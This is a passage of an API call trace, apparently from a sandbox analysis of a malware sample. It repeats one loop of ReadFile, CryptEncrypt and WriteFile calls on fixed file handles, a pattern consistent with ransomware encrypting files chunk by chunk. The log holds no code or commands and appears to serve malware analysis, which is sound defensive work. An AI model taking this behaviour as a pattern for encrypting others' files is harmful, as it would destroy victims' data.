lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.945] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.945] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.945] GetLastError () returned 0x0 [0172.945] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.945] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.010] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.010] GetLastError () returned 0x0 [0173.010] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.010] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.010] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.010] GetLastError () returned 0x0 [0173.010] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.010] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.010] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.010] GetLastError () returned 0x0 [0173.010] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.010] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.010] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.010] GetLastError () returned 0x0 [0173.010] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.010] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.010] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.010] GetLastError () returned 0x0 [0173.010] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.010] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.010] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.011] GetLastError () returned 0x0 [0173.011] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.011] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.011] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.011] GetLastError () returned 0x0 [0173.011] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.011] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.011] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.011] GetLastError () returned 0x0 [0173.011] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.011] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.011] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.011] GetLastError () returned 0x0 [0173.011] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.011] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.011] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.011] GetLastError () returned 0x0 [0173.011] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.011] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.011] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.011] GetLastError () returned 0x0 [0173.011] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.011] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.011] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.011] GetLastError () returned 0x0 [0173.011] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.012] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.012] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.012] GetLastError () returned 0x0 [0173.012] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.012] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.012] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.012] GetLastError () returned 0x0 [0173.012] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.012] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.012] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.012] GetLastError () returned 0x0 [0173.012] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.012] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.012] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.012] GetLastError () returned 0x0 [0173.012] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.012] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.012] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.012] GetLastError () returned 0x0 [0173.012] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.012] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.012] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.012] GetLastError () returned 0x0 [0173.012] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.013] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.013] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.013] GetLastError () returned 0x0 [0173.013] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.013] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.013] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.013] GetLastError () returned 0x0 [0173.013] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.013] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.013] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.013] GetLastError () returned 0x0 [0173.013] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.013] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.013] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.013] GetLastError () returned 0x0 [0173.013] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.013] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.013] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.013] GetLastError () returned 0x0 [0173.013] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.013] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.013] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.013] GetLastError () returned 0x0 [0173.013] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.014] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.014] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.014] GetLastError () returned 0x0 [0173.014] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.014] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.014] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.014] GetLastError () returned 0x0 [0173.014] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.014] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.014] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.014] GetLastError () returned 0x0 [0173.014] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.014] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.014] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.014] GetLastError () returned 0x0 [0173.014] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.014] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.014] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.014] GetLastError () returned 0x0 [0173.014] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.014] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.014] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.014] GetLastError () returned 0x0 [0173.014] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.014] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, 